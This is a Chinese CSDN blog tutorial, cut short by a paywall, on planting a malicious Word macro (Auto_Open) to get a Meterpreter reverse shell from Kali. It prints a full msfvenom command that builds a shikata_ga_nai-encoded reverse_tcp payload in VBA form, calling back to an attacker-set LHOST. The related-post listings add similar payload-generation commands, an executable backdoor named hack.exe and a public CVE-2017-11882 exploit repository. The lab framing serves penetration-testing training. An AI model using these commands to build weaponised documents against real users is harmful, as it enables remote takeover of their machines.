网络安全kali之利用宏感染word文档获取shell

已于 2023-03-28 15:36:56 修改
阅读量8.2k 收藏 30
点赞数
分类专栏: 网络安全 程序员 码农 文章标签: 网络安全 kali word
于 2022-03-25 17:02:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xueshenlaila/article/details/123738732
版权
本教程介绍了如何在Kali系统中通过宏病毒来感染Word文档,从而获取shell。首先在Win7虚拟机上安装Office 2016,然后生成宏代码和payload。在Word中创建宏命名为Auto_Open,粘贴宏代码,并将payload放入正文。保存文档后,通过Metasploit框架设置监听。打开Word文档,payload会执行并连接到MSF,成功建立session,即使关闭文档session仍然有效。
摘要由CSDN通过智能技术生成

首先将office 2016.zip上传到win7虚拟机上,解压后,安装一下office。

┌──(root💀xuegod53)-[~]
└─# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -e 
x86/shikata_ga_nai -i 10 -f vba-exe

视频教程

执行完成后会生成2段代码
第一段代码是MACRO CODE [ˈmækrəʊ kəʊd] 宏代码
从这里开始:
在这里插入图片描述
到这里结束:
在这里插入图片描述
第二段代码 payload。
在这里插入图片描述
注:*号中的内容不要,从这个往下开始复制,如下:

最低0.47元/天 解锁文章
极客事纪
关注
专栏目录
利用感染 word 文档获取windows系统的 shell
Cwillchris的博客
05-27 424
利用感染 word 文档获取window的 shell 实验环境: kali攻击机(192.168.98.30) window目标机(192.168.98.35) office 2016 实验步骤: 1、生成后门 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.98.30 LPORT=5555 -e x86/shikata_ga_nai -i 10 -f vba-ex
利用感染Word文档获取Shell
YtyVerilog的博客
09-20 246
通过插入恶意并传播包含恶意的文档,攻击者可以获取受害者的Shell利用感染Word文档获取Shell 的攻击原理基于恶意(Macro)的利用。攻击者通过在Word文档中插入恶意,当受害者打开该文档时,恶意将被执行,从而导致Shell(命令行界面)的获取。当受害者打开包含恶意的文档时,恶意将执行Shell 函数调用,与远程主机建立连接并获取Shell。上述恶意代码在文档打开时会自动执行,它使用Shell函数调用cmd.exe 并与远程主机建立连接,从而获取Shell
MSF利用病毒感染word文档获取shell复现
永远是少年
06-14 2421
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF利用病毒感染word文档获取shell复现。 一、环境准备 二、文档生成 三、效果检验
小白学KALI:轻松在Kali Linux使用WPS软件
最新发布
Kali与编程
08-31 275
有学员问我,如何在Kali使用WPS编辑文件,毕竟在Windows使用惯了,想无缝衔接到Linux环境。WPS官方有提供Linux版本,我们马上去安装Linux版本的WPS套件。快跟我操作,今天又能学废一个新技巧!2、将下载好的WPS软件包上传到Kali。4、如果不用,也可卸载WPS。
office漏洞利用--获取shell
weixin_33842304的博客
12-11 179
  环境:   kali系统, windows系统   流程:   在kali系统生成利用文件, kali系统下监听本地端口, windows系统打开doc文件,即可中招      第一种利用方式, 适合测试用:     从git下载代码: git clone https://github.com/Ridter/CVE-2017-11882     执行以下代码, 会在当前...
kali后门php,kali获取持续性后门shell · 醉梦半醒’s Blog
weixin_34501374的博客
03-29 473
win7靶机:192.168.1.38kali:192.168.1.35上一篇讲到通过ms17_010获取shell,如果对方没有这个漏洞可以利用呢?换一种社会工程学的思路:msfvenom -p windows/meterpreter/resverse_tcp lhost=192.168.1.35 lport=4444 -f exe -o /hack.exe 生成木马将exe文件发送给靶机u...
【网络空间实战攻防能力训练】渗透测试第三周(漏洞利用Ⅱ)
记录学习成长之路上的点点滴滴
12-01 202
2023/11/24 网络空间实战攻防能力训练课程渗透测试实验第三周:漏洞利用
【愚公系列】2023年05月 网络安全高级班 079.Kali Linux&Metasploit渗透测试(Metasploit漏洞利用阶段)
时光隧道
05-31 7745
Metasploit实战通常可以分为三个阶段:信息搜集、漏洞利用和提权。信息搜集阶段:在这个阶段中,渗透测试人员需要利用各种可用的信息收集工具和技术收集目标系统的关键信息。这些信息可能包括目标系统的IP地址、端口、网络拓扑、服务和应用程序版本信息、操作系统、Web应用程序框架等等。漏洞利用阶段:在这个阶段中,渗透测试人员使用已知的或自己发现的漏洞来攻击目标系统。渗透测试人员使用Metasploit框架来执行攻击,并尝试获得对目标系统的访问权限。这个阶段中还可能包括密码破解和社会工程学等攻击技术。
利用 0day 双杀-java 环境-感染-安卓客户端渗透
weixin_46035615的博客
04-26 3496
利用 0day 双杀-java 环境-感染-安卓客户端渗透 1 实战-利用 0DAY 漏洞获取 shell 2 实战-基于 java 环境的漏洞利用获取 shell 3 实战-利用感染 word 文档获取 shell 4 安卓客户端渗透
使用病毒反弹shell
qq_42671480的博客
05-23 956
病毒是一种寄存在文档或模板的中的计算机病毒。一旦打开这样的文档,其中的就会被执行,于是病毒就会被激活,转移到计算机上,并驻留在Normal模板上。从此以后,所有自动保存的文档都会“感染”上这种病毒,而且如果其他用户打开了感染病毒的文档,病毒又会转移到他的计算机上。那么,病毒是如何产生的呢? 准备环境 kali 攻击机 win7 靶机 生成payload 使用kali虚拟机,输入以下...
kali 如何使用word_如何使用word中的多级列表
weixin_36051940的博客
12-23 152
word的多级列表在写学术文章中是很有用的,关系到生成目录和插入题注等操作。今天在知乎上好像还未找到比较系统得讲这方面的文章、回答,所以我自己总结了一下,放到这里。如果有错误的地方,还请麻烦帮忙指出,我加以修正,谢谢。多级列表的位置首先,如果我对文章的章节列表需求是这样的话,多级列表中的初始的列表可能就不满足了。举例:我的需求那么我就要定义新的多级列表了。在此之前,我们来分析一下章节列表的结构:首...
使用Kali Linux Metasploit 复现 word
xujing19920814的博客
10-01 1638
使用Kali Linux Metasploit 复现
Kali渗透测试:使用Word病毒进行渗透攻击
Liu_Bruce的博客
05-14 4670
Kali渗透测试:使用病毒进行渗透攻击 VBA是基于Visual Basic发展而来的,与Visual Basic具有相似的语言结构。使用VBA可以完成很多事情,基于Excel、Word的VBA小程序不计其数。病毒在Word中引入之后出现的。目前Office 是较为流行的编辑软件,并且跨越了多种操作系统,病毒利用这一点得到了大范围的传播。 构造一个包含病毒的Word文件也并不复杂,只要编写一个Auto_Open函数,就可自动引发病毒。 在Word打开这个文件时, 病毒会执行, 然后感染其他文件或
kali 如何使用word_Kali linux 2016.2(Rolling)中的payloads模块详解
weixin_39630999的博客
12-29 468
root@kali:~# msfconsoleMetasploit Park, System Security InterfaceVersion4.0.5, Alpha EReady...>access securityaccess: PERMISSION DENIED.>access security gridaccess: PERMISSION DENIED.>access ...
office病毒反弹shell实验
AFCC_的博客(Web_Dog)
12-10 1191
0x00 什么是病毒 病毒就是Word中被嵌入的带有恶意行为的代码(VBA代码),当打开带有病毒的word文档时,嵌入其中的代码会自动运行 Word 将下列名称识别为自动,或称“auto”,当相应动作被执行,会自动调用满足条件的VBA代码。 AutoExec:启动 Word 或加载全局模板时 AutoNew:每次新建文档时 AutoOpen:每次打开已有文档时 ...
Word病毒
qq_43717119的博客
06-22 1万+
Word病毒 【实验目的】 1、演示的编写。 2、说明的原理及其安全漏洞和缺陷。 3、理解病毒的作用机制,从而加强对病毒的认识,提高防范意识。 【实验环境】 在windows虚拟机中演示word病毒的发生机制,以及如何清除病毒的一系列操作病毒样本:自我复制及感染病毒(copy.txt)类台湾一号病毒(No1.txt) 实验注意事项:为了保证该试验不至于造成较大破坏性,进行实验感染后,被感染终端不要打开过多的word文档,否则清除比较麻烦(对每个打开过的文档都要清除)。 【实验预备知识点】 Wo
Kalikali主要工具使用说明(文末附超全思维导图)
热门推荐
PP_zi的博客
05-11 4万+
本文为《从实践中学习Kali Linux渗透测试》总结笔记,仅供学习使用,禁止用于非法用途,转载请附上原文链接! 1. 信息收集 1.1 发现主机 traceroute 获取目标主机的路由条目,确定网络拓扑。每一跳表示一个网关,星号可能为防火墙导致。 1.1.1 扫描主机 ① nmap nmap -sP ip/ip段 对目标主机实施ping扫描,探测主机是否在线 也可以通过其他语法,扫描主机开放端口、使用的操作系统等 ② Netdiscover ARP侦查工具,可以扫描IP地址,检查在线主机。 .
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值